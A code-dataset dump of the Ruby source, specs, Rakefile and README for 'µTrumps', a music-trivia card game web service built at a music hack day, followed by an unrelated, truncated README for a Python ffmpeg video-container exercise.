"text": "module MuTrumps\n module Web\n \n class Frontend < Rack::URLMap\n def initialize(map = {})\n @application = Application.new\n @messaging = Messaging.new(:timeout => 25)\n \n super('/messaging' => @messaging,\n '/' => @application)\n end\n end\n \n end\nend\n"
},
{
"alpha_fraction": 0.6269177198410034,
"alphanum_fraction": 0.6269177198410034,
"avg_line_length": 23.305084228515625,
"blob_id": "77d4353cc721e75a0b3a993730e54a59babe95b7",
"content_id": "971a9d4434ffc35b411f1b9e5dc14cde952dbc3a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 1434,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 59,
"path": "/config/schema.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "ActiveRecord::Schema.define do\n create_table :artists, :force => true do |t|\n t.timestamps\n t.string :name\n t.string :image_url\n end\n add_index :artists, :name\n \n create_table :artists_users, :force => true, :id => false do |t|\n t.integer :artist_id\n t.integer :user_id\n end\n add_index :artists_users, :artist_id\n add_index :artists_users, :user_id\n \n create_table :cards, :force => true do |t|\n t.timestamps\n t.belongs_to :artist\n t.belongs_to :game\n t.belongs_to :user\n t.integer :position\n end\n add_index :cards, [:game_id, :position]\n \n create_table :games, :force => true do |t|\n t.timestamps\n t.belongs_to :current_user\n t.string :current_stat\n end\n \n create_table :games_users, :force => true, :id => false do |t|\n t.integer :game_id\n t.integer :user_id\n end\n add_index :games_users, :game_id\n add_index :games_users, :user_id\n \n create_table :statistics, :force => true do |t|\n t.timestamps\n t.belongs_to :artist\n t.string :name\n t.float :value\n end\n add_index :statistics, [:artist_id, :name]\n \n create_table :identifiers, :force => true do |t|\n t.timestamps\n t.belongs_to :artist\n t.string :name\n t.string :value\n end\n add_index :identifiers, [:artist_id, :name]\n\n create_table :users, :force => true do |t|\n t.timestamps\n t.string :lastfm_username\n end\n add_index :users, :lastfm_username\nend\n"
},
{
"alpha_fraction": 0.6609442234039307,
"alphanum_fraction": 0.6609442234039307,
"avg_line_length": 24.88888931274414,
"blob_id": "8c49d3c95864e4f5330cb5b4411bddd01cfa433e",
"content_id": "ff3eefeac6f6bb070a9de401cda4f89e322d77ad",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 233,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 9,
"path": "/lib/mu_trumps/web.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "module MuTrumps\n module Web\n \n autoload :Frontend, ROOT + '/mu_trumps/web/frontend'\n autoload :Application, ROOT + '/mu_trumps/web/application'\n autoload :Messaging, ROOT + '/mu_trumps/web/messaging'\n \n end\nend\n"
},
{
"alpha_fraction": 0.6596305966377258,
"alphanum_fraction": 0.6754617691040039,
"avg_line_length": 24.266666412353516,
"blob_id": "acc172df107d5d9b16d2ac16edaa4efbb8157129",
"content_id": "0a4a93b0aab993888edefb89fdbfdeb079df715b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 379,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 15,
"path": "/spec/mu_trumps/importer/seven_digital_spec.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "require 'spec_helper'\n\ndescribe MuTrumps::Importer::SevenDigital do\n before do\n @imogen = Factory(:artist, :name => \"Imogen Heap\")\n @importer = MuTrumps::Importer::SevenDigital.new(@imogen)\n end\n\n describe \"import_identifier\" do\n it \"adds the 7digital ID to the artist\" do\n @importer.import_identifier\n @imogen.ids[\"7digital\"].should == \"8321\"\n end\n end\nend\n"
},
{
"alpha_fraction": 0.7033638954162598,
"alphanum_fraction": 0.7033638954162598,
"avg_line_length": 24.153846740722656,
"blob_id": "f8fc043f26ad4047c7c96bb525e53ed6b8abc6c1",
"content_id": "0454c77ea8854ad6b75cb3492f5b5368c1e76865",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 327,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 13,
"path": "/lib/mu_trumps/importer.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "require 'uri'\nrequire 'cgi'\nrequire 'net/http'\nrequire 'json'\nrequire 'nokogiri'\n\nmodule MuTrumps\n module Importer\n autoload :Echonest, ROOT + '/mu_trumps/importer/echonest'\n autoload :Lastfm, ROOT + '/mu_trumps/importer/lastfm'\n autoload :SevenDigital, ROOT + '/mu_trumps/importer/seven_digital'\n end\nend\n"
},
{
"alpha_fraction": 0.6616915464401245,
"alphanum_fraction": 0.6616915464401245,
"avg_line_length": 21.33333396911621,
"blob_id": "bf3d1c9a9b56089c8280f9533b7677e52ada9b8c",
"content_id": "ae9ff1cdb903486447cf66f55363bcdfffd6e31a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 201,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 9,
"path": "/lib/mu_trumps/model/user.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "module MuTrumps\n class User < ActiveRecord::Base\n has_and_belongs_to_many :artists, :uniq => true\n \n def self.[](username)\n find_or_create_by_lastfm_username(username)\n end\n end\nend\n"
},
{
"alpha_fraction": 0.7113401889801025,
"alphanum_fraction": 0.7113401889801025,
"avg_line_length": 26.714284896850586,
"blob_id": "7e54daede12cad3a01a8b365206059d251e612a9",
"content_id": "60678edba765c8d26507a974d78381e4e1c5927d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 194,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 7,
"path": "/lib/mu_trumps/model/identifier.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "module MuTrumps\n class Identifier < ActiveRecord::Base\n belongs_to :artist\n validates_presence_of :artist, :name, :value\n validates_uniqueness_of :name, :scope => :artist_id\n end\nend\n"
},
{
"alpha_fraction": 0.6415094137191772,
"alphanum_fraction": 0.6415094137191772,
"avg_line_length": 36.411766052246094,
"blob_id": "9910d2c17e04f2133d1a4394d277842a0e7caade",
"content_id": "1a4631ae3a5ba03ba5d6937decc03e3eb89d649c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 636,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 17,
"path": "/lib/mu_trumps.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "module MuTrumps\n ROOT = File.expand_path(File.dirname(__FILE__))\n \n autoload :Artist, ROOT + '/mu_trumps/model/artist'\n autoload :Card, ROOT + '/mu_trumps/model/card'\n autoload :Game, ROOT + '/mu_trumps/model/game'\n autoload :Identifier, ROOT + '/mu_trumps/model/identifier'\n autoload :Statistic, ROOT + '/mu_trumps/model/statistic'\n autoload :User, ROOT + '/mu_trumps/model/user'\n \n autoload :Web, ROOT + '/mu_trumps/web'\n \n autoload :Importer, ROOT + '/mu_trumps/importer'\n autoload :Settings, ROOT + '/mu_trumps/settings'\nend\n\nrequire MuTrumps::ROOT + '/../config/environment'\n"
},
{
"alpha_fraction": 0.5443205833435059,
"alphanum_fraction": 0.5489649772644043,
"avg_line_length": 34.38028335571289,
"blob_id": "25b852ca90002cd7a083086b99c1799c0fd77423",
"content_id": "5cb5e1dfa768cca86eebbdc9d0414e8606a6ff0c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 7536,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 213,
"path": "/spec/mu_trumps/web/application_spec.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "require 'spec_helper'\n\ndescribe MuTrumps::Web::Application do\n include Rack::Test::Methods\n let(:app) { MuTrumps::Web::Application.new }\n let(:json) { JSON.parse(last_response.body) }\n \n def artist_json(artist)\n {\"id\" => artist.id, \"name\" => artist.name, \"image\" => artist.image_url}\n end\n \n before do\n @imogen = Factory(:artist, :name => \"Imogen Heap\", :id => 100)\n @justin = Factory(:artist, :name => \"Justin Bieber\")\n @gaga = Factory(:artist, :name => \"Lady Gaga\")\n @sufjan = Factory(:artist, :name => \"Sufjan Stevens\")\n \n MuTrumps::Artist.all.each_with_index do |artist, index|\n artist.assign(\"stamina\", index)\n end\n \n @alice = Factory(:user, :lastfm_username => \"alice\")\n @bob = Factory(:user, :lastfm_username => \"bob\")\n end\n \n describe \"/artists/:id\" do\n before do\n artist = @imogen\n artist.assign(\"releases\", 23)\n artist.assign(\"concerts\", 1024)\n\n artist.identifiers << MuTrumps::Identifier.new(:name => \"7digital\", :value => \"8321\")\n end\n \n it \"returns details for an artist\" do\n get \"/artists/100.json\"\n json.should == {\n \"id\" => 100,\n \"name\" => \"Imogen Heap\",\n \"identifiers\" => {\n \"7digital\" => \"8321\"\n },\n \"stats\" => {\n \"releases\" => 23,\n \"concerts\" => 1024,\n \"stamina\" => 0\n }\n }\n end\n end\n \n describe \"/users/register.json\" do\n it \"returns an existing user\" do\n post \"/users/register.json\", :username => \"alice\"\n json.should == {\"id\" => @alice.id, \"username\" => \"alice\"}\n end\n \n it \"creates a new user\" do\n MuTrumps::User.find_by_lastfm_username(\"cecil\").should be_nil\n post \"/users/register.json\", :username => \"cecil\"\n cecil = MuTrumps::User.find_by_lastfm_username(\"cecil\")\n json.should == {\"id\" => cecil.id, \"username\" => \"cecil\"}\n end\n end\n \n describe \"/games.json\" do\n describe \"with no waiting games\" do\n it \"creates a waiting game and returns the user's cards\" do\n post \"/games.json\", :username => \"someguy\"\n game_id = MuTrumps::Game.first.id\n json.should == {\n \"status\" => \"waiting\",\n \"id\" => game_id,\n \"cards\" => [artist_json(@imogen), artist_json(@gaga)]\n }\n end\n end\n \n describe \"with a waiting game\" do\n before do\n @game = MuTrumps::Game.join(@alice)\n end\n \n it \"makes the game ready and returns the user's cards\" do\n post \"/games.json\", :username => \"bob\"\n json.should == {\n \"status\" => \"ready\",\n \"id\" => @game.id,\n \"cards\" => [artist_json(@justin), artist_json(@sufjan)]\n }\n end\n \n it \"messages the user who started the game\" do\n MuTrumps::Web::Messaging.should_receive(:publish).with(@game, @alice, \"start\")\n MuTrumps::Web::Messaging.should_receive(:publish).with(@game, @alice, \"current_user\", \"username\" => \"alice\")\n MuTrumps::Web::Messaging.should_receive(:publish).with(@game, @bob, \"current_user\", \"username\" => \"alice\")\n post \"/games.json\", :username => \"bob\"\n end\n end\n end\n \n describe \"/games/:id.json\" do\n before do\n @game = MuTrumps::Game.join(@alice)\n MuTrumps::Game.join(@bob)\n end\n \n it \"returns the state of the game\" do\n get \"/games/#{@game.id}.json\"\n json.should == {\n \"status\" => \"ready\",\n \"id\" => @game.id,\n \"current_user\" => \"alice\",\n \"users\" => {\n \"alice\" => 2,\n \"bob\" => 2\n }\n }\n end\n end\n \n describe \"/games/:id/cards/:username.json\" do\n before do\n @game = MuTrumps::Game.join(@alice)\n MuTrumps::Game.join(@bob)\n end\n \n it \"returns the current deck for the user\" do\n get \"/games/#{@game.id}/cards/alice.json\"\n json.should == [artist_json(@imogen), artist_json(@gaga)]\n end\n end\n \n describe \"/games/:id/plays.json\" do\n before do\n MuTrumps::Game.join(@alice)\n @game = MuTrumps::Game.join(@bob)\n end\n \n it \"returns an error if an illegal move is made\" do\n post \"/games/#{@game.id}/plays.json\", :username => \"bob\", :artist_id => @justin.id, :stat => \"stamina\"\n json.should == {\"status\" => \"error\"}\n end\n \n it \"lets the current player make a move\" do\n post \"/games/#{@game.id}/plays.json\", :username => \"alice\", :artist_id => @imogen.id, :stat => \"stamina\"\n json.should == {\"status\" => \"ok\"}\n end\n \n it \"notifies the waiting user of the play\" do\n MuTrumps::Web::Messaging.should_receive(:publish).with(@game, @bob, \"play\",\n \"username\" => \"alice\",\n \"stat\" => \"stamina\",\n \"value\" => 0)\n \n post \"/games/#{@game.id}/plays.json\", :username => \"alice\", :artist_id => @imogen.id, :stat => \"stamina\"\n end\n end\n \n describe \"/games/:id/ack.json\" do\n before do\n MuTrumps::Game.join(@alice)\n @game = MuTrumps::Game.join(@bob)\n post \"/games/#{@game.id}/plays.json\", :username => \"alice\", :artist_id => @imogen.id, :stat => \"stamina\"\n end\n \n it \"allows the waiting user to acknowledge the play\" do\n post \"/games/#{@game.id}/ack.json\", :username => \"bob\"\n json.should == {\"status\" => \"ok\"}\n end\n \n it \"notifies both players about the result of the round\" do\n MuTrumps::Web::Messaging.should_receive(:publish).with(@game, @bob, \"result\", \"result\" => \"win\")\n MuTrumps::Web::Messaging.should_receive(:publish).with(@game, @alice, \"result\", \"result\" => \"lose\")\n\n MuTrumps::Web::Messaging.should_receive(:publish).with(@game, @bob, \"cards\", \"cards\" => [\n artist_json(@sufjan), artist_json(@imogen), artist_json(@justin)\n ])\n \n MuTrumps::Web::Messaging.should_receive(:publish).with(@game, @alice, \"cards\", \"cards\" => [\n artist_json(@gaga)\n ])\n \n MuTrumps::Web::Messaging.should_receive(:publish).with(@game, @alice, \"current_user\", \"username\" => \"bob\")\n MuTrumps::Web::Messaging.should_receive(:publish).with(@game, @bob, \"current_user\", \"username\" => \"bob\")\n \n post \"/games/#{@game.id}/ack.json\", :username => \"bob\"\n end\n \n describe \"when the move results in game over\" do\n before do\n post \"/games/#{@game.id}/ack.json\", :username => \"bob\"\n post \"/games/#{@game.id}/plays.json\", :username => \"bob\", :artist_id => @sufjan.id, :stat => \"stamina\"\n end\n \n it \"notifies both players about the result of the round\" do\n MuTrumps::Web::Messaging.should_receive(:publish).with(@game, @bob, \"result\", \"result\" => \"win\")\n MuTrumps::Web::Messaging.should_receive(:publish).with(@game, @alice, \"result\", \"result\" => \"lose\")\n \n MuTrumps::Web::Messaging.should_receive(:publish).with(@game, @bob, \"cards\", \"cards\" => [\n artist_json(@imogen), artist_json(@justin), artist_json(@gaga), artist_json(@sufjan)\n ])\n \n MuTrumps::Web::Messaging.should_receive(:publish).with(@game, @alice, \"cards\", \"cards\" => [])\n \n MuTrumps::Web::Messaging.should_receive(:publish).with(@game, @alice, \"winner\", \"username\" => \"bob\")\n MuTrumps::Web::Messaging.should_receive(:publish).with(@game, @bob, \"winner\", \"username\" => \"bob\")\n \n post \"/games/#{@game.id}/ack.json\", :username => \"alice\"\n end\n end\n end\nend\n"
},
{
"alpha_fraction": 0.578125,
"alphanum_fraction": 0.5838068127632141,
"avg_line_length": 24.14285659790039,
"blob_id": "63709bbc0e3de849dba79f9cd092bb216213f059",
"content_id": "fd81ddda1aeeaf77f206bd5218848e5e58111014",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 704,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 28,
"path": "/lib/mu_trumps/importer/seven_digital.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "module MuTrumps\n module Importer\n\n class SevenDigital\n SERVICE_ROOT = 'http://api.7digital.com/1.2/'\n\n def initialize(artist)\n @artist = artist\n end\n\n def import_identifier\n name = CGI.escape(@artist.name)\n uri = URI.parse(\"#{SERVICE_ROOT}artist/search?q=#{name}&oauth_consumer_key=#{api_key}&country=GB\")\n response = Net::HTTP.get_response(uri)\n doc = Nokogiri::XML(response.body)\n id = doc.search('artist').first['id']\n\n @artist.identifiers << Identifier.new(:name => '7digital', :value => id)\n rescue\n end\n\n def api_key\n Settings.seven_digital.consumer_key\n end\n end\n\n end\nend\n"
},
{
"alpha_fraction": 0.5573333501815796,
"alphanum_fraction": 0.5573333501815796,
"avg_line_length": 18.736841201782227,
"blob_id": "189e40c6a179fb2d4681d6b052d0f0f44f3ece24",
"content_id": "9ae892a9f32b036826a939cc5976c8b7c4a6d62f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 375,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 19,
"path": "/lib/mu_trumps/settings.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "module MuTrumps\n class Settings\n \n def self.method_missing(key)\n @root ||= new(YAML.load(File.read(ROOT + '/../config/settings.yml')))\n @root.__send__(key)\n end\n \n def initialize(hash)\n @hash = hash\n end\n \n def method_missing(key)\n value = @hash[key.to_s]\n Hash === value ? Settings.new(value) : value\n end\n \n end\nend\n"
},
{
"alpha_fraction": 0.7265322208404541,
"alphanum_fraction": 0.736229658126831,
"avg_line_length": 31.632911682128906,
"blob_id": "4f2369cedff4e4df302106e5c32e3fcdb3906b0b",
"content_id": "6c82c0f7f7e96f109b70875926a6bb89c973ee3d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "RDoc",
"length_bytes": 2580,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 79,
"path": "/README.rdoc",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "= µTrumps\n\nThis is the web service for µTrumps, a game built at Music Hack Day, at the\nMidem conference in Cannes. It was built by James[http://github.com/jcoglan],\nJono[http://github.com/jonocole], Ben[http://github.com/gearmonkey],\nJoris[http://twitter.com/joriszaalberg] and Gideon[http://twitter.com/gideonb].\n\nTo run the service, you need Ruby and these gems:\n\n gem install faye sinatra nokogiri activerecord acts_as_list sqlite3\n\nInitialize the database:\n\n rake db:setup\n\nAnd run the server:\n\n rackup -s thin -E production -p 8000 config.ru\n\n\n=== Tasks\n\n rake import:lastfm:top_artists[username]\n rake import:echonest:hotttnesss\n rake import:echonest:familiarity\n rake import:seven_digital:ids\n\n\n=== Testing\n\n gem install rspec rack-test factory_girl fakeweb\n rspec -bcf nested spec/\n\n\n== Service API\n\nThe service provides a RESTish interface for interacting with the game engine.\nThis consists of several GET/POST endpoints and a Bayeux messaging service, all\nof which output JSON.\n\n\n=== Using the messaging service\n\nIn-game events are transmitted to players through a pub/sub messaging service\nusing the Bayeux protocol. Each client should subscribe to a channel for the\ncurrent game and user, for example <tt>/games/1/alice</tt>. If you're developing\na JavaScript or Ruby client, you can use Faye[http://faye.jcoglan.com] to\nsubscribe to the channel and receive events.\n\nIf you don't have a Bayeux client available, you can set up long-polling by\nbuilding the protocol messages yourself: see https://gist.github.com/795082.\n\nEvents are transmitted as the data payload of Bayeux messages, so you can get\nthem using the Faye client:\n\n var fayeClient = new Faye.Client('http://localhost:8000/messaging')\n \n fayeClient.subscribe('/games/1/alice', function(event) {\n // handle event object\n })\n\nIf you're doing long-polling by hand, you can get the events out of the\n<tt>/meta/connect</tt> response by looking for messages with <tt>data</tt>\nfields, e.g.:\n\n connect = '{\"channel\":\"/meta/connect\",\"clientId\":\"' + client_id + '\",\"connectionType\":\"long-polling\"}'\n response = Net::HTTP.post_form(endpoint, 'message' => connect)\n \n # response.body == '[{\"channel\":\"/meta/connect\",...},{\"channel\":\"/games/1/alice\",\"data\":{\"event\":\"start\",...}},...]'\n JSON.parse(response.body).each do |message|\n if message['data']\n handle_event(message['data'])\n end\n end\n\nRemember to unsubscribe from the game channel when the game is over. See\nhttps://gist.github.com/795082 if you need to implement this yourself.\n\n fayeClient.unsubscribe('/games/1/alice')\n"
},
{
"alpha_fraction": 0.4851662516593933,
"alphanum_fraction": 0.4854219853878021,
"avg_line_length": 30.280000686645508,
"blob_id": "6363e470f38b6881e89ce5a0c17e39f48b224b92",
"content_id": "fb3e1bc85379c3e006863ad2395b376b79c0bfd8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 3910,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 125,
"path": "/lib/mu_trumps/web/application.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "require 'sinatra'\nrequire 'json'\n\nmodule MuTrumps\n module Web\n \n class Application < Sinatra::Base\n helpers do\n def cards_for_user(game, user)\n game.cards_for(user).map do |card|\n {'id' => card.artist.id, 'name' => card.artist.name, 'image' => card.artist.image_url}\n end\n end\n \n def notify_current_user(game)\n game.users.each do |user|\n Messaging.publish(game, user, 'current_user', 'username' => game.current_user.lastfm_username)\n end\n end\n \n def return_json(hash)\n headers 'Content-Type' => 'application/json'\n JSON.dump(hash)\n end\n end\n \n error do\n return_json('status' => 'error')\n end\n \n get '/artists/:id.json' do\n artist = Artist.find(params[:id])\n return_json('id' => artist.id,\n 'name' => artist.name,\n 'identifiers' => artist.ids,\n 'stats' => artist.stats)\n end\n \n post '/users/register.json' do\n user = User[params[:username]]\n return_json('id' => user.id, 'username' => user.lastfm_username)\n end\n \n post '/games.json' do\n user = User[params[:username]]\n game = Game.join(user)\n \n if game.users.size == 2\n Messaging.publish(game, game.users.first, \"start\")\n notify_current_user(game)\n end\n \n return_json('status' => game.status,\n 'id' => game.id,\n 'cards' => cards_for_user(game, user))\n end\n \n get '/games/:id.json' do\n game = Game.find(params[:id])\n scores = game.users.map { |u| [u.lastfm_username, game.cards_for(u).size] }\n \n return_json('status' => game.status,\n 'id' => game.id,\n 'current_user' => game.current_user.lastfm_username,\n 'users' => Hash[scores])\n end\n \n get '/games/:id/cards/:username.json' do\n game = Game.find(params[:id])\n user = User.find_by_lastfm_username(params[:username])\n return_json(cards_for_user(game, user))\n end\n \n post '/games/:id/plays.json' do\n begin\n game = Game.find(params[:id])\n user = User.find_by_lastfm_username(params[:username])\n artist = Artist.find(params[:artist_id])\n stat = params[:stat]\n \n game.play(user, artist, stat)\n \n Messaging.publish(game, game.waiting_user, 'play',\n 'username' => user.lastfm_username,\n 'stat' => stat,\n 'value' => artist.stats[stat])\n \n return_json('status' => 'ok')\n rescue\n return_json('status' => 'error')\n end\n end\n \n post '/games/:id/ack.json' do\n begin\n game = Game.find(params[:id])\n user = User.find_by_lastfm_username(params[:username])\n \n game.ack(user)\n \n Messaging.publish(game, game.current_user, 'result', 'result' => 'win')\n Messaging.publish(game, game.waiting_user, 'result', 'result' => 'lose')\n \n [game.current_user, game.waiting_user].each do |user|\n Messaging.publish(game, user, 'cards', 'cards' => cards_for_user(game, user))\n end\n \n if winner = game.winner\n game.users.each do |user|\n Messaging.publish(game, user, 'winner', 'username' => winner.lastfm_username)\n end\n else\n notify_current_user(game)\n end\n \n return_json('status' => 'ok')\n rescue\n return_json('status' => 'error')\n end\n end\n \n end\n \n end\nend\n"
},
{
"alpha_fraction": 0.5981395244598389,
"alphanum_fraction": 0.6120930314064026,
"avg_line_length": 23.43181800842285,
"blob_id": "ef18058b9b34d56b2a1a1ba64c19b02467217805",
"content_id": "2f789d9fa062abe46ab19840956cb9c30bf337c9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 1075,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 44,
"path": "/spec/mu_trumps/model/artist_spec.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "require 'spec_helper'\n\ndescribe MuTrumps::Artist do\n let(:artist) do\n MuTrumps::Artist.create(:name => \"Imogen Heap\")\n end\n \n it \"is valid\" do\n artist.should be_valid\n end\n \n describe \"without a name\" do\n before { artist.name = nil }\n \n it \"is not valid\" do\n artist.should_not be_valid\n end\n end\n \n describe \"stats\" do\n before do\n artist.statistics << MuTrumps::Statistic.new(:name => \"releases\", \"value\" => 12)\n artist.statistics << MuTrumps::Statistic.new(:name => \"concerts\", \"value\" => 950)\n end\n \n it \"returns the statictics as a hash\" do\n artist.stats.should == {\"releases\" => 12, \"concerts\" => 950}\n end\n end\n \n describe \"assign\" do\n it \"adds a statistic to the artist\" do\n artist.assign(\"releases\", 9)\n artist.stats[\"releases\"].should == 9\n end\n \n it \"modifies an existing statistic\" do\n artist.assign(\"releases\", 2)\n artist.assign(\"releases\", 4)\n artist.statistics.should == [MuTrumps::Statistic.first]\n artist.stats.should == {\"releases\" => 4}\n end\n end\nend\n"
},
{
"alpha_fraction": 0.6104512810707092,
"alphanum_fraction": 0.6104512810707092,
"avg_line_length": 22.38888931274414,
"blob_id": "06c2c24a076127cb94a57e833614c6c033eb048d",
"content_id": "54a3757e27243afbfaba10aa6ce64409957c9370",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 421,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 18,
"path": "/spec/mu_trumps/importer/lastfm_spec.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "require 'spec_helper'\n\ndescribe MuTrumps::Importer::Lastfm do\n let(:importer) { MuTrumps::Importer::Lastfm.new(\"jcoglan\") }\n \n describe \"import_top_artists\" do\n let(:import) { importer.import_top_artists }\n \n it \"creates artists\" do\n import\n MuTrumps::Artist.all.map(&:name).should == [\n \"Iron & Wine\",\n \"The Magnetic Fields\",\n \"School of Seven Bells\"\n ]\n end\n end\nend\n"
},
{
"alpha_fraction": 0.6474480032920837,
"alphanum_fraction": 0.6474480032920837,
"avg_line_length": 23.045454025268555,
"blob_id": "886845c902fc7234380722dedff1137acc7ebbce",
"content_id": "22d0e2f42a8dc793e6896c72c4837197a989e699",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 1058,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 44,
"path": "/Rakefile",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "require './lib/mu_trumps'\n\nnamespace :import do\n namespace :lastfm do\n task :top_artists, :username do |t, args|\n importer = MuTrumps::Importer::Lastfm.new(args.username)\n importer.logger { |s| puts s }\n importer.import_top_artists\n end\n end\n \n namespace :echonest do\n task :hotttnesss do\n MuTrumps::Artist.all.each do |artist|\n importer = MuTrumps::Importer::Echonest.new(artist)\n importer.import_hotttnesss\n end\n end\n \n task :familiarity do\n MuTrumps::Artist.all.each do |artist|\n importer = MuTrumps::Importer::Echonest.new(artist)\n importer.import_familiarity\n end\n end\n end\n\n namespace :seven_digital do\n task :ids do\n MuTrumps::Artist.all.each do |artist|\n importer = MuTrumps::Importer::SevenDigital.new(artist)\n importer.import_identifier\n end\n end\n end\nend\n\nnamespace :db do\n task :setup do\n dir = File.expand_path(File.dirname(__FILE__))\n require dir + '/config/environment'\n require dir + '/config/schema'\n end\nend\n"
},
{
"alpha_fraction": 0.6282420754432678,
"alphanum_fraction": 0.639769434928894,
"avg_line_length": 22.133333206176758,
"blob_id": "9f3a5fb491d9faea567143bc32e50c251a6de2ab",
"content_id": "2a9f5ff149b65fd2ae12478ecf088a91f815951e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 347,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 15,
"path": "/spec/thin_runner.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "module ThinRunner\n def start(port)\n handler = Rack::Handler.get('thin')\n Thread.new do\n handler.run(self, :Port => port) { |server| @http_server = server }\n end\n sleep 0.1 until EM.reactor_running?\n end\n \n def stop\n @http_server.stop if @http_server\n @http_server = nil\n sleep 0.1 while EM.reactor_running?\n end\nend\n"
}
] | 37 |
paumonterop/P3_SCAV_VIDEO
|
https://github.com/paumonterop/P3_SCAV_VIDEO
|
fda39e1aa10439f8691d0ca4266d3f8242349dde
|
9413750bf3c684275e6fcf722cea1002ccd26da1
|
6a91e8e17a7c1831f758ac9b6bc0aee2df2449d2
|
refs/heads/main
| 2023-01-29T18:36:49.307062 | 2020-12-12T10:48:17 | 2020-12-12T10:48:17 | 319,476,605 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7328727841377258,
"alphanum_fraction": 0.7633851170539856,
"avg_line_length": 41.34146499633789,
"blob_id": "fa1329ed73b07add1df455a9de815330d8c934d5",
"content_id": "60069e8418555329e344a292750d835d28282437",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1741,
"license_type": "no_license",
"max_line_length": 236,
"num_lines": 41,
"path": "/README.md",
"repo_name": "paumonterop/P3_SCAV_VIDEO",
"src_encoding": "UTF-8",
"text": "# P3_SCAV_VIDEO\nPràctica 3 - SCAV - VIDEO\n\n**EXERCICI 1**\n\n- Cut BBB into 1 minute only video.\n*Amb el comando que ja haviem vist a les pràctiques anteriors*\n\n- Export BBB(1min) audio as a mono track.\nffmpeg -i bbb_1min.mp4 -ac 1 -acodec mp3 bbb_mp3.mp3\n\n- Export BBB(1min) audio in lower bitrate.\nffmpeg -i bbb_1min_mp3.mp3 -map 0:a:0 -b:a 16k bbb_1min_lowbitrate.mp3\n\n- Get subtitles of BBB through the internet and cut only the first minute (sorry, I think this needs to be done manually)\nbbb_subtitles.srt\n\n- Now package everything in a .mp4 with FFMPEG!!\nffmpeg -i bbb_1min.mp4 -i bbb_1min_lowbitrate.mp3 -i bbb_subtitles.srt -c copy -map 0:v:0 -map 1:a:0 -c:s mov_text bbb_1min_audio_subtitles.mp4\n\n\n**EXERCICI 2**\n\nAquest script permet crear un container MP4 directament executant-lo des del terminal posant el videoInput, AudioInput, subtitulsInput i el nom del fitxer de sortida. També es pot executar només er ajuntar audio al container de l'arxiu.\nEl podem executar des del terminal de la seguent manera:\nEXEMPLE: *python3 MP4container.py 'bbb_1min.mp4' 'bbb_mp3.mp3' 'bbb_subtitles.srt' 'outputFile.mp4'*\n\n**EXERCICI 3**\n\nAquest script et diu en quins Standards s'ajusta el video en questio tenint en compte el video i l'audio.\nEs pot executar directament des del terminal de la seguent manera:\nEXEMPLE: *python3 readMP4container.py 'video.mp4'*\n\n**EXERCICI 4**\n\nAquest script permet rear containers i saber amb quin standard s'ajusten\nEs pot executar des de terminal de la seguent manera\nEXEMPLE: *python3 testContainer.py 